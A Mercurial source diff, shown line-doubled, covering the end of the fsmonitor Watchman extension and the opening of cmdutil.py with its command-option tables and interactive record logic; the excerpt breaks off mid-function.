521 _cmpsets([modified, added, removed, deleted, unknown, ignored, clean],
521 _cmpsets([modified, added, removed, deleted, unknown, ignored, clean],
522 rv2)
522 rv2)
523 modified, added, removed, deleted, unknown, ignored, clean = rv2
523 modified, added, removed, deleted, unknown, ignored, clean = rv2
524
524
525 return scmutil.status(
525 return scmutil.status(
526 modified, added, removed, deleted, unknown, ignored, clean)
526 modified, added, removed, deleted, unknown, ignored, clean)
527
527
528 class poststatus(object):
528 class poststatus(object):
529 def __init__(self, startclock):
529 def __init__(self, startclock):
530 self._startclock = startclock
530 self._startclock = startclock
531
531
532 def __call__(self, wctx, status):
532 def __call__(self, wctx, status):
533 clock = wctx.repo()._fsmonitorstate.getlastclock() or self._startclock
533 clock = wctx.repo()._fsmonitorstate.getlastclock() or self._startclock
534 hashignore = _hashignore(wctx.repo().dirstate._ignore)
534 hashignore = _hashignore(wctx.repo().dirstate._ignore)
535 notefiles = (status.modified + status.added + status.removed +
535 notefiles = (status.modified + status.added + status.removed +
536 status.deleted + status.unknown)
536 status.deleted + status.unknown)
537 wctx.repo()._fsmonitorstate.set(clock, hashignore, notefiles)
537 wctx.repo()._fsmonitorstate.set(clock, hashignore, notefiles)
538
538
539 def makedirstate(repo, dirstate):
539 def makedirstate(repo, dirstate):
540 class fsmonitordirstate(dirstate.__class__):
540 class fsmonitordirstate(dirstate.__class__):
541 def _fsmonitorinit(self, fsmonitorstate, watchmanclient):
541 def _fsmonitorinit(self, fsmonitorstate, watchmanclient):
542 # _fsmonitordisable is used in paranoid mode
542 # _fsmonitordisable is used in paranoid mode
543 self._fsmonitordisable = False
543 self._fsmonitordisable = False
544 self._fsmonitorstate = fsmonitorstate
544 self._fsmonitorstate = fsmonitorstate
545 self._watchmanclient = watchmanclient
545 self._watchmanclient = watchmanclient
546
546
547 def walk(self, *args, **kwargs):
547 def walk(self, *args, **kwargs):
548 orig = super(fsmonitordirstate, self).walk
548 orig = super(fsmonitordirstate, self).walk
549 if self._fsmonitordisable:
549 if self._fsmonitordisable:
550 return orig(*args, **kwargs)
550 return orig(*args, **kwargs)
551 return overridewalk(orig, self, *args, **kwargs)
551 return overridewalk(orig, self, *args, **kwargs)
552
552
553 def rebuild(self, *args, **kwargs):
553 def rebuild(self, *args, **kwargs):
554 self._fsmonitorstate.invalidate()
554 self._fsmonitorstate.invalidate()
555 return super(fsmonitordirstate, self).rebuild(*args, **kwargs)
555 return super(fsmonitordirstate, self).rebuild(*args, **kwargs)
556
556
557 def invalidate(self, *args, **kwargs):
557 def invalidate(self, *args, **kwargs):
558 self._fsmonitorstate.invalidate()
558 self._fsmonitorstate.invalidate()
559 return super(fsmonitordirstate, self).invalidate(*args, **kwargs)
559 return super(fsmonitordirstate, self).invalidate(*args, **kwargs)
560
560
561 dirstate.__class__ = fsmonitordirstate
561 dirstate.__class__ = fsmonitordirstate
562 dirstate._fsmonitorinit(repo._fsmonitorstate, repo._watchmanclient)
562 dirstate._fsmonitorinit(repo._fsmonitorstate, repo._watchmanclient)
563
563
564 def wrapdirstate(orig, self):
564 def wrapdirstate(orig, self):
565 ds = orig(self)
565 ds = orig(self)
566 # only override the dirstate when Watchman is available for the repo
566 # only override the dirstate when Watchman is available for the repo
567 if util.safehasattr(self, '_fsmonitorstate'):
567 if util.safehasattr(self, '_fsmonitorstate'):
568 makedirstate(self, ds)
568 makedirstate(self, ds)
569 return ds
569 return ds
570
570
571 def extsetup(ui):
571 def extsetup(ui):
572 extensions.wrapfilecache(
572 extensions.wrapfilecache(
573 localrepo.localrepository, 'dirstate', wrapdirstate)
573 localrepo.localrepository, 'dirstate', wrapdirstate)
574 if pycompat.sysplatform == 'darwin':
574 if pycompat.sysplatform == 'darwin':
575 # An assist for avoiding the dangling-symlink fsevents bug
575 # An assist for avoiding the dangling-symlink fsevents bug
576 extensions.wrapfunction(os, 'symlink', wrapsymlink)
576 extensions.wrapfunction(os, 'symlink', wrapsymlink)
577
577
578 extensions.wrapfunction(merge, 'update', wrapupdate)
578 extensions.wrapfunction(merge, 'update', wrapupdate)
579
579
580 def wrapsymlink(orig, source, link_name):
580 def wrapsymlink(orig, source, link_name):
581 ''' if we create a dangling symlink, also touch the parent dir
581 ''' if we create a dangling symlink, also touch the parent dir
582 to encourage fsevents notifications to work more correctly '''
582 to encourage fsevents notifications to work more correctly '''
583 try:
583 try:
584 return orig(source, link_name)
584 return orig(source, link_name)
585 finally:
585 finally:
586 try:
586 try:
587 os.utime(os.path.dirname(link_name), None)
587 os.utime(os.path.dirname(link_name), None)
588 except OSError:
588 except OSError:
589 pass
589 pass
590
590
591 class state_update(object):
591 class state_update(object):
592 ''' This context manager is responsible for dispatching the state-enter
592 ''' This context manager is responsible for dispatching the state-enter
593 and state-leave signals to the watchman service '''
593 and state-leave signals to the watchman service '''
594
594
595 def __init__(self, repo, node, distance, partial):
595 def __init__(self, repo, node, distance, partial):
596 self.repo = repo
596 self.repo = repo
597 self.node = node
597 self.node = node
598 self.distance = distance
598 self.distance = distance
599 self.partial = partial
599 self.partial = partial
600 self._lock = None
600 self._lock = None
601 self.need_leave = False
601 self.need_leave = False
602
602
603 def __enter__(self):
603 def __enter__(self):
604 # We explicitly need to take a lock here, before we proceed to update
604 # We explicitly need to take a lock here, before we proceed to update
605 # watchman about the update operation, so that we don't race with
605 # watchman about the update operation, so that we don't race with
606 # some other actor. merge.update is going to take the wlock almost
606 # some other actor. merge.update is going to take the wlock almost
607 # immediately anyway, so this is effectively extending the lock
607 # immediately anyway, so this is effectively extending the lock
608 # around a couple of short sanity checks.
608 # around a couple of short sanity checks.
609 self._lock = self.repo.wlock()
609 self._lock = self.repo.wlock()
610 self.need_leave = self._state('state-enter')
610 self.need_leave = self._state('state-enter')
611 return self
611 return self
612
612
613 def __exit__(self, type_, value, tb):
613 def __exit__(self, type_, value, tb):
614 try:
614 try:
615 if self.need_leave:
615 if self.need_leave:
616 status = 'ok' if type_ is None else 'failed'
616 status = 'ok' if type_ is None else 'failed'
617 self._state('state-leave', status=status)
617 self._state('state-leave', status=status)
618 finally:
618 finally:
619 if self._lock:
619 if self._lock:
620 self._lock.release()
620 self._lock.release()
621
621
622 def _state(self, cmd, status='ok'):
622 def _state(self, cmd, status='ok'):
623 if not util.safehasattr(self.repo, '_watchmanclient'):
623 if not util.safehasattr(self.repo, '_watchmanclient'):
624 return False
624 return False
625 try:
625 try:
626 commithash = self.repo[self.node].hex()
626 commithash = self.repo[self.node].hex()
627 self.repo._watchmanclient.command(cmd, {
627 self.repo._watchmanclient.command(cmd, {
628 'name': 'hg.update',
628 'name': 'hg.update',
629 'metadata': {
629 'metadata': {
630 # the target revision
630 # the target revision
631 'rev': commithash,
631 'rev': commithash,
632 # approximate number of commits between current and target
632 # approximate number of commits between current and target
633 'distance': self.distance,
633 'distance': self.distance,
634 # success/failure (only really meaningful for state-leave)
634 # success/failure (only really meaningful for state-leave)
635 'status': status,
635 'status': status,
636 # whether the working copy parent is changing
636 # whether the working copy parent is changing
637 'partial': self.partial,
637 'partial': self.partial,
638 }})
638 }})
639 return True
639 return True
640 except Exception as e:
640 except Exception as e:
641 # Swallow any errors; fire and forget
641 # Swallow any errors; fire and forget
642 self.repo.ui.log(
642 self.repo.ui.log(
643 'watchman', 'Exception %s while running %s\n', e, cmd)
643 'watchman', 'Exception %s while running %s\n', e, cmd)
644 return False
644 return False
645
645
646 # Bracket working copy updates with calls to the watchman state-enter
646 # Bracket working copy updates with calls to the watchman state-enter
647 # and state-leave commands. This allows clients to perform more intelligent
647 # and state-leave commands. This allows clients to perform more intelligent
648 # settling during bulk file change scenarios
648 # settling during bulk file change scenarios
649 # https://facebook.github.io/watchman/docs/cmd/subscribe.html#advanced-settling
649 # https://facebook.github.io/watchman/docs/cmd/subscribe.html#advanced-settling
650 def wrapupdate(orig, repo, node, branchmerge, force, ancestor=None,
650 def wrapupdate(orig, repo, node, branchmerge, force, ancestor=None,
651 mergeancestor=False, labels=None, matcher=None, **kwargs):
651 mergeancestor=False, labels=None, matcher=None, **kwargs):
652
652
653 distance = 0
653 distance = 0
654 partial = True
654 partial = True
655 if matcher is None or matcher.always():
655 if matcher is None or matcher.always():
656 partial = False
656 partial = False
657 wc = repo[None]
657 wc = repo[None]
658 parents = wc.parents()
658 parents = wc.parents()
659 if len(parents) == 2:
659 if len(parents) == 2:
660 anc = repo.changelog.ancestor(parents[0].node(), parents[1].node())
660 anc = repo.changelog.ancestor(parents[0].node(), parents[1].node())
661 ancrev = repo[anc].rev()
661 ancrev = repo[anc].rev()
662 distance = abs(repo[node].rev() - ancrev)
662 distance = abs(repo[node].rev() - ancrev)
663 elif len(parents) == 1:
663 elif len(parents) == 1:
664 distance = abs(repo[node].rev() - parents[0].rev())
664 distance = abs(repo[node].rev() - parents[0].rev())
665
665
666 with state_update(repo, node, distance, partial):
666 with state_update(repo, node, distance, partial):
667 return orig(
667 return orig(
668 repo, node, branchmerge, force, ancestor, mergeancestor,
668 repo, node, branchmerge, force, ancestor, mergeancestor,
669 labels, matcher, **kwargs)
669 labels, matcher, **kwargs)
670
670
671 def reposetup(ui, repo):
671 def reposetup(ui, repo):
672 # We don't work with largefiles or inotify
672 # We don't work with largefiles or inotify
673 exts = extensions.enabled()
673 exts = extensions.enabled()
674 for ext in _blacklist:
674 for ext in _blacklist:
675 if ext in exts:
675 if ext in exts:
676 ui.warn(_('The fsmonitor extension is incompatible with the %s '
676 ui.warn(_('The fsmonitor extension is incompatible with the %s '
677 'extension and has been disabled.\n') % ext)
677 'extension and has been disabled.\n') % ext)
678 return
678 return
679
679
680 if repo.local():
680 if repo.local():
681 # We don't work with subrepos either.
681 # We don't work with subrepos either.
682 #
682 #
683 # if repo[None].substate can cause a dirstate parse, which is too
683 # if repo[None].substate can cause a dirstate parse, which is too
684 # slow. Instead, look for a file called hgsubstate,
684 # slow. Instead, look for a file called hgsubstate,
685 if repo.wvfs.exists('.hgsubstate') or repo.wvfs.exists('.hgsub'):
685 if repo.wvfs.exists('.hgsubstate') or repo.wvfs.exists('.hgsub'):
686 return
686 return
687
687
688 fsmonitorstate = state.state(repo)
688 fsmonitorstate = state.state(repo)
689 if fsmonitorstate.mode == 'off':
689 if fsmonitorstate.mode == 'off':
690 return
690 return
691
691
692 try:
692 try:
693 client = watchmanclient.client(repo)
693 client = watchmanclient.client(repo)
694 except Exception as ex:
694 except Exception as ex:
695 _handleunavailable(ui, fsmonitorstate, ex)
695 _handleunavailable(ui, fsmonitorstate, ex)
696 return
696 return
697
697
698 repo._fsmonitorstate = fsmonitorstate
698 repo._fsmonitorstate = fsmonitorstate
699 repo._watchmanclient = client
699 repo._watchmanclient = client
700
700
701 dirstate, cached = localrepo.isfilecached(repo, 'dirstate')
701 dirstate, cached = localrepo.isfilecached(repo, 'dirstate')
702 if cached:
702 if cached:
703 # at this point since fsmonitorstate wasn't present,
703 # at this point since fsmonitorstate wasn't present,
704 # repo.dirstate is not a fsmonitordirstate
704 # repo.dirstate is not a fsmonitordirstate
705 makedirstate(repo, dirstate)
705 makedirstate(repo, dirstate)
706
706
707 class fsmonitorrepo(repo.__class__):
707 class fsmonitorrepo(repo.__class__):
708 def status(self, *args, **kwargs):
708 def status(self, *args, **kwargs):
709 orig = super(fsmonitorrepo, self).status
709 orig = super(fsmonitorrepo, self).status
710 return overridestatus(orig, self, *args, **kwargs)
710 return overridestatus(orig, self, *args, **kwargs)
711
711
712 repo.__class__ = fsmonitorrepo
712 repo.__class__ = fsmonitorrepo
@@ -1,3762 +1,3762 b''
1 # cmdutil.py - help for command processing in mercurial
1 # cmdutil.py - help for command processing in mercurial
2 #
2 #
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import errno
10 import errno
11 import itertools
11 import itertools
12 import os
12 import os
13 import re
13 import re
14 import tempfile
14 import tempfile
15
15
16 from .i18n import _
16 from .i18n import _
17 from .node import (
17 from .node import (
18 hex,
18 hex,
19 nullid,
19 nullid,
20 nullrev,
20 nullrev,
21 short,
21 short,
22 )
22 )
23
23
24 from . import (
24 from . import (
25 bookmarks,
25 bookmarks,
26 changelog,
26 changelog,
27 copies,
27 copies,
28 crecord as crecordmod,
28 crecord as crecordmod,
29 dirstateguard,
29 dirstateguard,
30 encoding,
30 encoding,
31 error,
31 error,
32 formatter,
32 formatter,
33 graphmod,
33 graphmod,
34 match as matchmod,
34 match as matchmod,
35 obsolete,
35 obsolete,
36 patch,
36 patch,
37 pathutil,
37 pathutil,
38 phases,
38 phases,
39 pycompat,
39 pycompat,
40 registrar,
40 registrar,
41 revlog,
41 revlog,
42 revset,
42 revset,
43 scmutil,
43 scmutil,
44 smartset,
44 smartset,
45 templatekw,
45 templatekw,
46 templater,
46 templater,
47 util,
47 util,
48 vfs as vfsmod,
48 vfs as vfsmod,
49 )
49 )
50 stringio = util.stringio
50 stringio = util.stringio
51
51
52 # templates of common command options
52 # templates of common command options
53
53
54 dryrunopts = [
54 dryrunopts = [
55 ('n', 'dry-run', None,
55 ('n', 'dry-run', None,
56 _('do not perform actions, just print output')),
56 _('do not perform actions, just print output')),
57 ]
57 ]
58
58
59 remoteopts = [
59 remoteopts = [
60 ('e', 'ssh', '',
60 ('e', 'ssh', '',
61 _('specify ssh command to use'), _('CMD')),
61 _('specify ssh command to use'), _('CMD')),
62 ('', 'remotecmd', '',
62 ('', 'remotecmd', '',
63 _('specify hg command to run on the remote side'), _('CMD')),
63 _('specify hg command to run on the remote side'), _('CMD')),
64 ('', 'insecure', None,
64 ('', 'insecure', None,
65 _('do not verify server certificate (ignoring web.cacerts config)')),
65 _('do not verify server certificate (ignoring web.cacerts config)')),
66 ]
66 ]
67
67
68 walkopts = [
68 walkopts = [
69 ('I', 'include', [],
69 ('I', 'include', [],
70 _('include names matching the given patterns'), _('PATTERN')),
70 _('include names matching the given patterns'), _('PATTERN')),
71 ('X', 'exclude', [],
71 ('X', 'exclude', [],
72 _('exclude names matching the given patterns'), _('PATTERN')),
72 _('exclude names matching the given patterns'), _('PATTERN')),
73 ]
73 ]
74
74
75 commitopts = [
75 commitopts = [
76 ('m', 'message', '',
76 ('m', 'message', '',
77 _('use text as commit message'), _('TEXT')),
77 _('use text as commit message'), _('TEXT')),
78 ('l', 'logfile', '',
78 ('l', 'logfile', '',
79 _('read commit message from file'), _('FILE')),
79 _('read commit message from file'), _('FILE')),
80 ]
80 ]
81
81
82 commitopts2 = [
82 commitopts2 = [
83 ('d', 'date', '',
83 ('d', 'date', '',
84 _('record the specified date as commit date'), _('DATE')),
84 _('record the specified date as commit date'), _('DATE')),
85 ('u', 'user', '',
85 ('u', 'user', '',
86 _('record the specified user as committer'), _('USER')),
86 _('record the specified user as committer'), _('USER')),
87 ]
87 ]
88
88
89 # hidden for now
89 # hidden for now
90 formatteropts = [
90 formatteropts = [
91 ('T', 'template', '',
91 ('T', 'template', '',
92 _('display with template (EXPERIMENTAL)'), _('TEMPLATE')),
92 _('display with template (EXPERIMENTAL)'), _('TEMPLATE')),
93 ]
93 ]
94
94
95 templateopts = [
95 templateopts = [
96 ('', 'style', '',
96 ('', 'style', '',
97 _('display using template map file (DEPRECATED)'), _('STYLE')),
97 _('display using template map file (DEPRECATED)'), _('STYLE')),
98 ('T', 'template', '',
98 ('T', 'template', '',
99 _('display with template'), _('TEMPLATE')),
99 _('display with template'), _('TEMPLATE')),
100 ]
100 ]
101
101
102 logopts = [
102 logopts = [
103 ('p', 'patch', None, _('show patch')),
103 ('p', 'patch', None, _('show patch')),
104 ('g', 'git', None, _('use git extended diff format')),
104 ('g', 'git', None, _('use git extended diff format')),
105 ('l', 'limit', '',
105 ('l', 'limit', '',
106 _('limit number of changes displayed'), _('NUM')),
106 _('limit number of changes displayed'), _('NUM')),
107 ('M', 'no-merges', None, _('do not show merges')),
107 ('M', 'no-merges', None, _('do not show merges')),
108 ('', 'stat', None, _('output diffstat-style summary of changes')),
108 ('', 'stat', None, _('output diffstat-style summary of changes')),
109 ('G', 'graph', None, _("show the revision DAG")),
109 ('G', 'graph', None, _("show the revision DAG")),
110 ] + templateopts
110 ] + templateopts
111
111
112 diffopts = [
112 diffopts = [
113 ('a', 'text', None, _('treat all files as text')),
113 ('a', 'text', None, _('treat all files as text')),
114 ('g', 'git', None, _('use git extended diff format')),
114 ('g', 'git', None, _('use git extended diff format')),
115 ('', 'binary', None, _('generate binary diffs in git mode (default)')),
115 ('', 'binary', None, _('generate binary diffs in git mode (default)')),
116 ('', 'nodates', None, _('omit dates from diff headers'))
116 ('', 'nodates', None, _('omit dates from diff headers'))
117 ]
117 ]
118
118
119 diffwsopts = [
119 diffwsopts = [
120 ('w', 'ignore-all-space', None,
120 ('w', 'ignore-all-space', None,
121 _('ignore white space when comparing lines')),
121 _('ignore white space when comparing lines')),
122 ('b', 'ignore-space-change', None,
122 ('b', 'ignore-space-change', None,
123 _('ignore changes in the amount of white space')),
123 _('ignore changes in the amount of white space')),
124 ('B', 'ignore-blank-lines', None,
124 ('B', 'ignore-blank-lines', None,
125 _('ignore changes whose lines are all blank')),
125 _('ignore changes whose lines are all blank')),
126 ]
126 ]
127
127
128 diffopts2 = [
128 diffopts2 = [
129 ('', 'noprefix', None, _('omit a/ and b/ prefixes from filenames')),
129 ('', 'noprefix', None, _('omit a/ and b/ prefixes from filenames')),
130 ('p', 'show-function', None, _('show which function each change is in')),
130 ('p', 'show-function', None, _('show which function each change is in')),
131 ('', 'reverse', None, _('produce a diff that undoes the changes')),
131 ('', 'reverse', None, _('produce a diff that undoes the changes')),
132 ] + diffwsopts + [
132 ] + diffwsopts + [
133 ('U', 'unified', '',
133 ('U', 'unified', '',
134 _('number of lines of context to show'), _('NUM')),
134 _('number of lines of context to show'), _('NUM')),
135 ('', 'stat', None, _('output diffstat-style summary of changes')),
135 ('', 'stat', None, _('output diffstat-style summary of changes')),
136 ('', 'root', '', _('produce diffs relative to subdirectory'), _('DIR')),
136 ('', 'root', '', _('produce diffs relative to subdirectory'), _('DIR')),
137 ]
137 ]
138
138
139 mergetoolopts = [
139 mergetoolopts = [
140 ('t', 'tool', '', _('specify merge tool')),
140 ('t', 'tool', '', _('specify merge tool')),
141 ]
141 ]
142
142
143 similarityopts = [
143 similarityopts = [
144 ('s', 'similarity', '',
144 ('s', 'similarity', '',
145 _('guess renamed files by similarity (0<=s<=100)'), _('SIMILARITY'))
145 _('guess renamed files by similarity (0<=s<=100)'), _('SIMILARITY'))
146 ]
146 ]
147
147
148 subrepoopts = [
148 subrepoopts = [
149 ('S', 'subrepos', None,
149 ('S', 'subrepos', None,
150 _('recurse into subrepositories'))
150 _('recurse into subrepositories'))
151 ]
151 ]
152
152
153 debugrevlogopts = [
153 debugrevlogopts = [
154 ('c', 'changelog', False, _('open changelog')),
154 ('c', 'changelog', False, _('open changelog')),
155 ('m', 'manifest', False, _('open manifest')),
155 ('m', 'manifest', False, _('open manifest')),
156 ('', 'dir', '', _('open directory manifest')),
156 ('', 'dir', '', _('open directory manifest')),
157 ]
157 ]
158
158
159 # special string such that everything below this line will be ingored in the
159 # special string such that everything below this line will be ingored in the
160 # editor text
160 # editor text
161 _linebelow = "^HG: ------------------------ >8 ------------------------$"
161 _linebelow = "^HG: ------------------------ >8 ------------------------$"
162
162
163 def ishunk(x):
163 def ishunk(x):
164 hunkclasses = (crecordmod.uihunk, patch.recordhunk)
164 hunkclasses = (crecordmod.uihunk, patch.recordhunk)
165 return isinstance(x, hunkclasses)
165 return isinstance(x, hunkclasses)
166
166
167 def newandmodified(chunks, originalchunks):
167 def newandmodified(chunks, originalchunks):
168 newlyaddedandmodifiedfiles = set()
168 newlyaddedandmodifiedfiles = set()
169 for chunk in chunks:
169 for chunk in chunks:
170 if ishunk(chunk) and chunk.header.isnewfile() and chunk not in \
170 if ishunk(chunk) and chunk.header.isnewfile() and chunk not in \
171 originalchunks:
171 originalchunks:
172 newlyaddedandmodifiedfiles.add(chunk.header.filename())
172 newlyaddedandmodifiedfiles.add(chunk.header.filename())
173 return newlyaddedandmodifiedfiles
173 return newlyaddedandmodifiedfiles
174
174
175 def parsealiases(cmd):
175 def parsealiases(cmd):
176 return cmd.lstrip("^").split("|")
176 return cmd.lstrip("^").split("|")
177
177
178 def setupwrapcolorwrite(ui):
178 def setupwrapcolorwrite(ui):
179 # wrap ui.write so diff output can be labeled/colorized
179 # wrap ui.write so diff output can be labeled/colorized
180 def wrapwrite(orig, *args, **kw):
180 def wrapwrite(orig, *args, **kw):
181 label = kw.pop('label', '')
181 label = kw.pop('label', '')
182 for chunk, l in patch.difflabel(lambda: args):
182 for chunk, l in patch.difflabel(lambda: args):
183 orig(chunk, label=label + l)
183 orig(chunk, label=label + l)
184
184
185 oldwrite = ui.write
185 oldwrite = ui.write
186 def wrap(*args, **kwargs):
186 def wrap(*args, **kwargs):
187 return wrapwrite(oldwrite, *args, **kwargs)
187 return wrapwrite(oldwrite, *args, **kwargs)
188 setattr(ui, 'write', wrap)
188 setattr(ui, 'write', wrap)
189 return oldwrite
189 return oldwrite
190
190
191 def filterchunks(ui, originalhunks, usecurses, testfile, operation=None):
191 def filterchunks(ui, originalhunks, usecurses, testfile, operation=None):
192 if usecurses:
192 if usecurses:
193 if testfile:
193 if testfile:
194 recordfn = crecordmod.testdecorator(testfile,
194 recordfn = crecordmod.testdecorator(testfile,
195 crecordmod.testchunkselector)
195 crecordmod.testchunkselector)
196 else:
196 else:
197 recordfn = crecordmod.chunkselector
197 recordfn = crecordmod.chunkselector
198
198
199 return crecordmod.filterpatch(ui, originalhunks, recordfn, operation)
199 return crecordmod.filterpatch(ui, originalhunks, recordfn, operation)
200
200
201 else:
201 else:
202 return patch.filterpatch(ui, originalhunks, operation)
202 return patch.filterpatch(ui, originalhunks, operation)
203
203
204 def recordfilter(ui, originalhunks, operation=None):
204 def recordfilter(ui, originalhunks, operation=None):
205 """ Prompts the user to filter the originalhunks and return a list of
205 """ Prompts the user to filter the originalhunks and return a list of
206 selected hunks.
206 selected hunks.
207 *operation* is used for to build ui messages to indicate the user what
207 *operation* is used for to build ui messages to indicate the user what
208 kind of filtering they are doing: reverting, committing, shelving, etc.
208 kind of filtering they are doing: reverting, committing, shelving, etc.
209 (see patch.filterpatch).
209 (see patch.filterpatch).
210 """
210 """
211 usecurses = crecordmod.checkcurses(ui)
211 usecurses = crecordmod.checkcurses(ui)
212 testfile = ui.config('experimental', 'crecordtest')
212 testfile = ui.config('experimental', 'crecordtest')
213 oldwrite = setupwrapcolorwrite(ui)
213 oldwrite = setupwrapcolorwrite(ui)
214 try:
214 try:
215 newchunks, newopts = filterchunks(ui, originalhunks, usecurses,
215 newchunks, newopts = filterchunks(ui, originalhunks, usecurses,
216 testfile, operation)
216 testfile, operation)
217 finally:
217 finally:
218 ui.write = oldwrite
218 ui.write = oldwrite
219 return newchunks, newopts
219 return newchunks, newopts
220
220
221 def dorecord(ui, repo, commitfunc, cmdsuggest, backupall,
221 def dorecord(ui, repo, commitfunc, cmdsuggest, backupall,
222 filterfn, *pats, **opts):
222 filterfn, *pats, **opts):
223 from . import merge as mergemod
223 from . import merge as mergemod
224 opts = pycompat.byteskwargs(opts)
224 opts = pycompat.byteskwargs(opts)
225 if not ui.interactive():
225 if not ui.interactive():
226 if cmdsuggest:
226 if cmdsuggest:
227 msg = _('running non-interactively, use %s instead') % cmdsuggest
227 msg = _('running non-interactively, use %s instead') % cmdsuggest
228 else:
228 else:
229 msg = _('running non-interactively')
229 msg = _('running non-interactively')
230 raise error.Abort(msg)
230 raise error.Abort(msg)
231
231
232 # make sure username is set before going interactive
232 # make sure username is set before going interactive
233 if not opts.get('user'):
233 if not opts.get('user'):
234 ui.username() # raise exception, username not provided
234 ui.username() # raise exception, username not provided
235
235
236 def recordfunc(ui, repo, message, match, opts):
236 def recordfunc(ui, repo, message, match, opts):
237 """This is generic record driver.
237 """This is generic record driver.
238
238
239 Its job is to interactively filter local changes, and
239 Its job is to interactively filter local changes, and
240 accordingly prepare working directory into a state in which the
240 accordingly prepare working directory into a state in which the
241 job can be delegated to a non-interactive commit command such as
241 job can be delegated to a non-interactive commit command such as
242 'commit' or 'qrefresh'.
242 'commit' or 'qrefresh'.
243
243
244 After the actual job is done by non-interactive command, the
244 After the actual job is done by non-interactive command, the
245 working directory is restored to its original state.
245 working directory is restored to its original state.
246
246
247 In the end we'll record interesting changes, and everything else
247 In the end we'll record interesting changes, and everything else
248 will be left in place, so the user can continue working.
248 will be left in place, so the user can continue working.
249 """
249 """
250
250
251 checkunfinished(repo, commit=True)
251 checkunfinished(repo, commit=True)
252 wctx = repo[None]
252 wctx = repo[None]
253 merge = len(wctx.parents()) > 1
253 merge = len(wctx.parents()) > 1
254 if merge:
254 if merge:
255 raise error.Abort(_('cannot partially commit a merge '
255 raise error.Abort(_('cannot partially commit a merge '
256 '(use "hg commit" instead)'))
256 '(use "hg commit" instead)'))
257
257
258 def fail(f, msg):
258 def fail(f, msg):
259 raise error.Abort('%s: %s' % (f, msg))
259 raise error.Abort('%s: %s' % (f, msg))
260
260
261 force = opts.get('force')
261 force = opts.get('force')
262 if not force:
262 if not force:
263 vdirs = []
263 vdirs = []
264 match.explicitdir = vdirs.append
264 match.explicitdir = vdirs.append
265 match.bad = fail
265 match.bad = fail
266
266
267 status = repo.status(match=match)
267 status = repo.status(match=match)
268 if not force:
268 if not force:
269 repo.checkcommitpatterns(wctx, vdirs, match, status, fail)
269 repo.checkcommitpatterns(wctx, vdirs, match, status, fail)
270 diffopts = patch.difffeatureopts(ui, opts=opts, whitespace=True)
270 diffopts = patch.difffeatureopts(ui, opts=opts, whitespace=True)
271 diffopts.nodates = True
271 diffopts.nodates = True
272 diffopts.git = True
272 diffopts.git = True
273 diffopts.showfunc = True
273 diffopts.showfunc = True
274 originaldiff = patch.diff(repo, changes=status, opts=diffopts)
274 originaldiff = patch.diff(repo, changes=status, opts=diffopts)
275 originalchunks = patch.parsepatch(originaldiff)
275 originalchunks = patch.parsepatch(originaldiff)
276
276
277 # 1. filter patch, since we are intending to apply subset of it
277 # 1. filter patch, since we are intending to apply subset of it
278 try:
278 try:
279 chunks, newopts = filterfn(ui, originalchunks)
279 chunks, newopts = filterfn(ui, originalchunks)
280 except patch.PatchError as err:
280 except patch.PatchError as err:
281 raise error.Abort(_('error parsing patch: %s') % err)
281 raise error.Abort(_('error parsing patch: %s') % err)
282 opts.update(newopts)
282 opts.update(newopts)
283
283
284 # We need to keep a backup of files that have been newly added and
284 # We need to keep a backup of files that have been newly added and
285 # modified during the recording process because there is a previous
285 # modified during the recording process because there is a previous
286 # version without the edit in the workdir
286 # version without the edit in the workdir
287 newlyaddedandmodifiedfiles = newandmodified(chunks, originalchunks)
287 newlyaddedandmodifiedfiles = newandmodified(chunks, originalchunks)
288 contenders = set()
288 contenders = set()
289 for h in chunks:
289 for h in chunks:
290 try:
290 try:
291 contenders.update(set(h.files()))
291 contenders.update(set(h.files()))
292 except AttributeError:
292 except AttributeError:
293 pass
293 pass
294
294
295 changed = status.modified + status.added + status.removed
295 changed = status.modified + status.added + status.removed
296 newfiles = [f for f in changed if f in contenders]
296 newfiles = [f for f in changed if f in contenders]
297 if not newfiles:
297 if not newfiles:
298 ui.status(_('no changes to record\n'))
298 ui.status(_('no changes to record\n'))
299 return 0
299 return 0
300
300
301 modified = set(status.modified)
301 modified = set(status.modified)
302
302
303 # 2. backup changed files, so we can restore them in the end
303 # 2. backup changed files, so we can restore them in the end
304
304
305 if backupall:
305 if backupall:
306 tobackup = changed
306 tobackup = changed
307 else:
307 else:
308 tobackup = [f for f in newfiles if f in modified or f in \
308 tobackup = [f for f in newfiles if f in modified or f in \
309 newlyaddedandmodifiedfiles]
309 newlyaddedandmodifiedfiles]
310 backups = {}
310 backups = {}
311 if tobackup:
311 if tobackup:
312 backupdir = repo.vfs.join('record-backups')
312 backupdir = repo.vfs.join('record-backups')
313 try:
313 try:
314 os.mkdir(backupdir)
314 os.mkdir(backupdir)
315 except OSError as err:
315 except OSError as err:
316 if err.errno != errno.EEXIST:
316 if err.errno != errno.EEXIST:
317 raise
317 raise
318 try:
318 try:
319 # backup continues
319 # backup continues
320 for f in tobackup:
320 for f in tobackup:
321 fd, tmpname = tempfile.mkstemp(prefix=f.replace('/', '_')+'.',
321 fd, tmpname = tempfile.mkstemp(prefix=f.replace('/', '_')+'.',
322 dir=backupdir)
322 dir=backupdir)
323 os.close(fd)
323 os.close(fd)
324 ui.debug('backup %r as %r\n' % (f, tmpname))
324 ui.debug('backup %r as %r\n' % (f, tmpname))
325 util.copyfile(repo.wjoin(f), tmpname, copystat=True)
325 util.copyfile(repo.wjoin(f), tmpname, copystat=True)
326 backups[f] = tmpname
326 backups[f] = tmpname
327
327
328 fp = stringio()
328 fp = stringio()
329 for c in chunks:
329 for c in chunks:
330 fname = c.filename()
330 fname = c.filename()
331 if fname in backups:
331 if fname in backups:
332 c.write(fp)
332 c.write(fp)
333 dopatch = fp.tell()
333 dopatch = fp.tell()
334 fp.seek(0)
334 fp.seek(0)
335
335
336 # 2.5 optionally review / modify patch in text editor
336 # 2.5 optionally review / modify patch in text editor
337 if opts.get('review', False):
337 if opts.get('review', False):
338 patchtext = (crecordmod.diffhelptext
338 patchtext = (crecordmod.diffhelptext
339 + crecordmod.patchhelptext
339 + crecordmod.patchhelptext
340 + fp.read())
340 + fp.read())
341 reviewedpatch = ui.edit(patchtext, "",
341 reviewedpatch = ui.edit(patchtext, "",
